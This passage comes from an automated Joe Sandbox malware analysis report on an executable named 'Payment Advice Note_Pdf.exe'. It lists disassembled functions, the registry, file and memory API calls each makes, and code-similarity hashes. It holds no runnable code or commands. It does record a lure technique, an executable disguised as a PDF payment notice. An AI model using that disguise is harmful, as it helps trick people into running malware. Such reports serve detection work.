Associated: 00000000.00000002.1303900007.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1304115213.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment Advice Note_Pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0a8ee5da33216ad141207925d20784d11e66eebf924bd7a5457e3a8945fa9096
Instruction ID: b0afa4bf9b2f32aef8b418d90c6ac84aec3754d6d6600e102a8a9184c58ea877
Opcode Fuzzy Hash: 0a8ee5da33216ad141207925d20784d11e66eebf924bd7a5457e3a8945fa9096
Instruction Fuzzy Hash: FD712471E00229DFDF24CFA8C844BADBBB1FB48305F15806AD846BB290C7395996DF54

Function 00406AA0 Relevance: 5.2, APIs: 4, Instructions: 170COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1303817138.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1303789428.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303870127.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1304115213.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment Advice Note_Pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 62bad76ded8dc27f8eed87459cf3b90d4506ad753805ad6fcc8c39a10a3f4707
Instruction ID: 02d0d75cb83947f83aad45c50880e4a386b83e744e149296eb7fa161ab999f08
Opcode Fuzzy Hash: 62bad76ded8dc27f8eed87459cf3b90d4506ad753805ad6fcc8c39a10a3f4707
Instruction Fuzzy Hash: 08714671E00219CFDF24CFA8C844BADBBB1FB44305F15806AD856BB290C7385956DF44

Function 004069EC Relevance: 5.2, APIs: 4, Instructions: 168COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1303817138.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1303789428.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303870127.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1304115213.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment Advice Note_Pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aa3d38d161a72bddb6f80e1dac2624ab657c9951173fd352498b2eb393463e7a
Instruction ID: eb15c3353e008649bdc799d0a197d89dfb60748dd6a42a5e4cae05a50034cddc
Opcode Fuzzy Hash: aa3d38d161a72bddb6f80e1dac2624ab657c9951173fd352498b2eb393463e7a
Instruction Fuzzy Hash: 67714571E00229DBDF28CF98C844BADBBB1FF44305F11806AD956BB291C7789A66DF44

Function 0040249E Relevance: 4.5, APIs: 3, Instructions: 44registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00402CC9: RegOpenKeyExW.KERNELBASE(00000000,00000397,00000000,00000022,00000000,?,?), ref: 00402CF1

RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 004024CD
RegEnumValueW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,00000003), ref: 004024E0
RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nseEFF9.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6

Memory Dump Source

Source File: 00000000.00000002.1303817138.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1303789428.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303870127.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1304115213.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment Advice Note_Pdf.jbxd

Similarity

API ID: Enum$CloseOpenValue
String ID:
API String ID: 167947723-0
Opcode ID: 86364fb9ebb07b36d15c6be79b944a7de30deed72edb5b74192718edbf401c07
Instruction ID: 9b49ef4685d11130b37b7b0c6276d492a5168a4a944959f4997216c5b5c768b0
Opcode Fuzzy Hash: 86364fb9ebb07b36d15c6be79b944a7de30deed72edb5b74192718edbf401c07
Instruction Fuzzy Hash: 1FF06D72A04204BBE7209F659E88ABF766DEF80354B10843AF505B61D0D6B85D419B6A

Function 100028A4 Relevance: 3.2, APIs: 2, Instructions: 156fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNELBASE(00000000), ref: 10002963
GetLastError.KERNEL32 ref: 10002A6A

Memory Dump Source

Source File: 00000000.00000002.1317193990.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.1317160855.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.1317225994.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.1317253099.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_Payment Advice Note_Pdf.jbxd

Similarity

API ID: CreateErrorFileLast
String ID:
API String ID: 1214770103-0
Opcode ID: 59d19e049e546944b5a660a22879eb7514e0dc07886846df9c342dd830f48687
Instruction ID: 77f315af6c145f6c632c2ebe68d3f6cdb0cf0445c85f86b19d364da59c27affc
Opcode Fuzzy Hash: 59d19e049e546944b5a660a22879eb7514e0dc07886846df9c342dd830f48687
Instruction Fuzzy Hash: 8851C4B9905214DFFB20DFA4DD8675937A8EB443D0F22C42AEA04E721DCE34E990CB55

Function 0040242A Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00402CC9: RegOpenKeyExW.KERNELBASE(00000000,00000397,00000000,00000022,00000000,?,?), ref: 00402CF1

RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?), ref: 0040245B
RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nseEFF9.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6

Memory Dump Source

Source File: 00000000.00000002.1303817138.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1303789428.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303870127.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1304115213.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment Advice Note_Pdf.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID:
API String ID: 3677997916-0
Opcode ID: 03d1c4bbc53212fa362be4be297b0d149c55634577e86bbd29c34c53d2567fc6
Instruction ID: 318f25c97078b56e75ac6278506f01b5a34a300aa28fb7ae5d2085b0d3939190
Opcode Fuzzy Hash: 03d1c4bbc53212fa362be4be297b0d149c55634577e86bbd29c34c53d2567fc6
Instruction Fuzzy Hash: F7117331915205EFDB14CFA4DA489BEB7B4EF44354F20843FE405B72D0D6B85A41DB5A

Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
SendMessageW.USER32(?,00000402,00000000), ref: 004013F4

Memory Dump Source

Source File: 00000000.00000002.1303817138.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1303789428.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303870127.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1304115213.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment Advice Note_Pdf.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 1f472dfcc894d90b0504cb8d955b7f6dcf6f20f1f7a064cd725307f95b817da4
Instruction ID: 1e7952006d9e226a8eb598a62733b1cad305e59e596fc6f41a9a7203fe322f79
Opcode Fuzzy Hash: 1f472dfcc894d90b0504cb8d955b7f6dcf6f20f1f7a064cd725307f95b817da4
Instruction Fuzzy Hash: 9401D131B24210EBE7295B389C05B6A3698E720318F10867EB915F62F1DA78DC028B5D

Function 004063F5 Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,?,00000020,004032D6,00000009,SETUPAPI,USERENV,UXTHEME), ref: 00406407
GetProcAddress.KERNEL32(00000000,?), ref: 00406422

Part of subcall function 00406389: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004063A0
Part of subcall function 00406389: wsprintfW.USER32 ref: 004063DB
Part of subcall function 00406389: LoadLibraryW.KERNELBASE(?), ref: 004063EB

Memory Dump Source

Source File: 00000000.00000002.1303817138.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1303789428.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303870127.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1304115213.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment Advice Note_Pdf.jbxd

Similarity

API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
String ID:
API String ID: 2547128583-0
Opcode ID: d7ac541ed48af1eacb80342b8b251201fb822529d60d72dade8e8733a6d6c095
Instruction ID: a9e24e321ddd3f073a9e6a165911cd393abac726806fbc755e3780b1e63cb1a6
Opcode Fuzzy Hash: d7ac541ed48af1eacb80342b8b251201fb822529d60d72dade8e8733a6d6c095
Instruction Fuzzy Hash: A7E086326082216BD31157745D4493B67A89BD5740306083EFD06F6181D734AC2296AD

Function 00401DDC Relevance: 3.0, APIs: 2, Instructions: 21COMMON

Download Yara Rule

APIs

ShowWindow.USER32(00000000,00000000,00000001), ref: 00401DF2
EnableWindow.USER32(00000000,00000000), ref: 00401DFD

Memory Dump Source

Source File: 00000000.00000002.1303817138.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1303789428.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303870127.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1304115213.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment Advice Note_Pdf.jbxd

Similarity

API ID: Window$EnableShow
String ID:
API String ID: 1136574915-0
Opcode ID: 5b4dded21515e85cdd7dd763c9abdbba58e278b110e9914daaceba62c2ae1f2f
Instruction ID: c4cc9d8bc17b60f52f9d6b5ec52db5efc6ce13511ecacb80f957bec5d45ae41a
Opcode Fuzzy Hash: 5b4dded21515e85cdd7dd763c9abdbba58e278b110e9914daaceba62c2ae1f2f
Instruction Fuzzy Hash: 69E08C32A04100ABC720AFB5AE8999E3375EF50369B10047BE402F10E1C6BCAC408A6E

Function 00405BF4 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(00000003,00402E2E,C:\Users\user\Desktop\Payment Advice Note_Pdf.exe,80000000,00000003,?,?,00000000,00403504,?), ref: 00405BF8
CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,00000000,00403504,?), ref: 00405C1A

Memory Dump Source

Source File: 00000000.00000002.1303817138.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1303789428.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303870127.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1304115213.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment Advice Note_Pdf.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: 742792ff7842fdd919adb4f35d156b5e8b6622b1384091bd21e9a064bfd9155a
Instruction ID: be88a92cb82447fd1599dbd49a9896cb6db060ceaa3ec03b2970cb079924df1d
Opcode Fuzzy Hash: 742792ff7842fdd919adb4f35d156b5e8b6622b1384091bd21e9a064bfd9155a
Instruction Fuzzy Hash: FDD09E71658201AFEF098F20DE16F2E7AA2EB84B00F10562CB642940E0D6B15815DB16

Function 004056CA Relevance: 3.0, APIs: 2, Instructions: 9COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNELBASE(?,00000000,0040325D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403496), ref: 004056D0
GetLastError.KERNEL32 ref: 004056DE

Memory Dump Source

Source File: 00000000.00000002.1303817138.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1303789428.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303870127.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1304115213.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment Advice Note_Pdf.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID:
API String ID: 1375471231-0
Opcode ID: d8dd424ede50ccfac4b7523ad15fca3fe61b3a2743ebd4ec855a49df1000c641
Instruction ID: d706e5ae47c7ee36432b9320fd90c1f42ce8b6abbc3a43a90ad219fc8104f268
Opcode Fuzzy Hash: d8dd424ede50ccfac4b7523ad15fca3fe61b3a2743ebd4ec855a49df1000c641
Instruction Fuzzy Hash: 5DC04C30A19602DBDA105B31DD0871B7954AB50742F60CD36610AE51A0DA769811DD3E

Function 00402786 Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00000000,?,00000000,00000002,?,?), ref: 004027A0

Part of subcall function 00405F66: wsprintfW.USER32 ref: 00405F73

Memory Dump Source

Source File: 00000000.00000002.1303817138.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1303789428.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303870127.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1304115213.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment Advice Note_Pdf.jbxd

Similarity

API ID: FilePointerwsprintf
String ID:
API String ID: 327478801-0
Opcode ID: 64c495f6a90fc039130ad8c13d00fda46c397e26af27c45f3e8a2568f411c02f
Instruction ID: 1ea0f4fe546ff0a6cc1a224cb0175f0568d280dd86a823eff906e537ce259dc5
Opcode Fuzzy Hash: 64c495f6a90fc039130ad8c13d00fda46c397e26af27c45f3e8a2568f411c02f
Instruction Fuzzy Hash: DBE01A72A05514ABDB11AFA59E4ACAF766AEB40328B14443BF105F00E1C67D8D019A2E

Function 00405C77 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,0040321F,00000000,00000000,00403076,000000FF,00000004,00000000,00000000,00000000), ref: 00405C8B

Memory Dump Source

Source File: 00000000.00000002.1303817138.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1303789428.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303870127.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1304115213.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment Advice Note_Pdf.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 706c1f52c55adc451273f1d2a5d46862a6587a7fe095f8bbabcbc32b8b015297
Instruction ID: b406f17295b0c4e2c80a39b4892fee2aa768816fba0af151b3e099c9f54450aa
Opcode Fuzzy Hash: 706c1f52c55adc451273f1d2a5d46862a6587a7fe095f8bbabcbc32b8b015297
Instruction Fuzzy Hash: 3BE08632114259ABDF119E508C04EEB3B5CEB04350F004436F911E3180D230E9209BA4

Function 00402CC9 Relevance: 1.5, APIs: 1, Instructions: 22registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(00000000,00000397,00000000,00000022,00000000,?,?), ref: 00402CF1

Memory Dump Source

Source File: 00000000.00000002.1303817138.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1303789428.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303870127.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1304115213.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment Advice Note_Pdf.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: dee534fb00c3da35f42930a873cbe089bc3ca12b7b75b89d27cc42400959d1ef
Instruction ID: 68f4dbfd07ce8b2f927ba9c023ef299b46c4db6be22e7618382101f0868acce4
Opcode Fuzzy Hash: dee534fb00c3da35f42930a873cbe089bc3ca12b7b75b89d27cc42400959d1ef
Instruction Fuzzy Hash: CCE04F76254108BADB00DFA4DD46EA577ECAB04700F004421BA08D60A1C674E5408768

Function 00405CA6 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,004031ED,00000000,0040BEC0,?,0040BEC0,?,000000FF,00000004,00000000), ref: 00405CBA

Memory Dump Source

Source File: 00000000.00000002.1303817138.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1303789428.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303870127.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1304115213.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment Advice Note_Pdf.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 00c0377323aa53eb430c82b83f01e62a2601c7c92c94a0140a128221a0f71a88
Instruction ID: 8766ac6266e8b07294e6d952513c2b0c694ccf73d68c0bd44325f5ff4784c02c
Opcode Fuzzy Hash: 00c0377323aa53eb430c82b83f01e62a2601c7c92c94a0140a128221a0f71a88
Instruction Fuzzy Hash: D4E08C3222835AABEF119E548C00EEB3B6CEB01360F004833F915E3190E231E9209BA8

Function 100027C7 Relevance: 1.5, APIs: 1, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(1000405C,00000004,00000040,1000404C), ref: 100027E5

Memory Dump Source

Source File: 00000000.00000002.1317193990.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.1317160855.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.1317225994.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.1317253099.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_Payment Advice Note_Pdf.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
Instruction ID: 0f6967942ea94a3d6c88e3f350f968197b77ea31d8e69eb9713f4ef8856af232
Opcode Fuzzy Hash: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
Instruction Fuzzy Hash: 47F0A5F15057A0DEF350DF688C847063BE4E3483C4B03852AE3A8F6269EB344454CF19

Function 004022DF Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

GetPrivateProfileStringW.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 00402310

Memory Dump Source

Source File: 00000000.00000002.1303817138.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1303789428.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303870127.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
